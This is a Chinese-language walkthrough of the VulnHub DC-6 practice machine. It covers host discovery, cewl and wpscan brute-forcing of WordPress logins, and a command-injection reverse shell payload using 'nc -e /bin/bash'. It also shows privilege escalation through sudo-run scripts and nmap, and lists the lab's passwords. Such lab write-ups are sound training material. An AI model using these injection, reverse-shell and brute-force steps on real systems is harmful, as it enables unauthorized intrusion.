总结:wpscan爆破,nmap提权
目录
下载地址
- DC-6.zip (Size: 619 MB)
- Download: http://www.five86.com/downloads/DC-6.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip
使用方法:解压后,使用vm直接打开ova文件。
漏洞分析
信息收集
这里还是使用DC-1的方法
1.给靶机设置一个快照
2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子
3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip
4.使用快照快速将靶机恢复
注:ip段要看自己的
这里只有22和80端口是开启的,这里查看一下网站。
这里出现和dc-2一样的问题,这里修改一下hosts文件就可以了
linux 通常在/etc/hosts
vim /etc/hosts 然后添加一行 靶机ip wordy
这里在网站没有找到什么东西,使用dirsearch扫目录来看看
这里选择的url是http://靶机ip,并不是重定向以后的网址。
这里去访问/wp-login.php,有后台的登入,但是经过访问,尝试弱口令还是不行,准备使用插件wappalyzer看看网站的指纹。
用户和密码爆破
这里看了看决定使用cewl和wpscan的组合。
//根据网页的内容输出一个字典
cewl https://www.wordy.com/ -w pass.txt
//使用命令枚举这个网站的用户
wpscan --url https://www.wordy.com/ -e u #使用这个没有枚举成功
wpscan --url http://wordy/ -e u #这个成功了,有点想不明白
//将枚举出来的几个用户输入到user.txt
echo "admin\ngraham\nmark\nsarah\njens" > user.txt
//尝试爆破密码
wpscan --url wordy -U user.txt -P passwd.txt 
这里使用cewl获得的字典pass.txt,但是没有破解出来。。。。
去看别人的wp才知道要使用/usr/share/wordlists/rockyou.txt作为字典,但是这个字典很大,我就将一些关于密码的一些提取到一个字典中,这时候我已经知道密码是helpdesk01了
注意:rockyou.txt字典是一个压缩包需要我们自己解压。
//提取相关密码到一个新的字典文件
cat /usr/share/wordlists/rockyou.txt | grep help > passwd.txt
//这里重新爆破
wpscan --url wordy -U user.txt -P passwd.txt 这里爆破出来了,http://wordy/wp-login.php 在这里登录
mark:helpdesk01
命令执行
这里找了半天也不知道那里有漏洞可以利用,多谢别人提醒,不然还不知道要找到什么时候
找到这里有一个命令执行的漏洞
这里看看。
这样就可以了,但是经过测试,这里有长度限制,但是经过查看只有前端的限制,后端没有限制,所以我们就可对前端修改就可以了
方法一:
这里长度限制15,但是我们可以修改。
方法二:
也是可以使用burpsuite来拦包修改,这里没有长度限制。
这里开始反弹shell
127.0.0.1;nc -e /bin/bash ip 端口 //使用python搞一个伪shell python -c "import pty;pty.spawn('/bin/bash')"
提权
这里原本想先用sudo -l看看有没有什么可以利用的,但是这里我们不知道www-data的密码,这里查看内核版本号,经过查看也没有什么可以利用的。
最后在用户的根目录中发现了可以文件夹,/home/mark/stuff中发现一个things-to-do.txt
这里发现了graham用户的密码,然后我们通过su来到graham用户中
graham:GSo7isUM1D4
在这里发现sudo -l没有需要密码,而且还有东西,这里去看看
//来到提权文件那里 cd /home/jens //添加可以提权的东西 echo "/bin/bash" >> backups.sh //这里原本直接提权到root,但是失败了 sudo -u root ./backups.sh //这里选择到jens中 sudo -u jens ./backups.sh
这里发现sudo -l,又发现了东西
这里查看一些关于nmap的提权方法。
这里就提权到root了
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
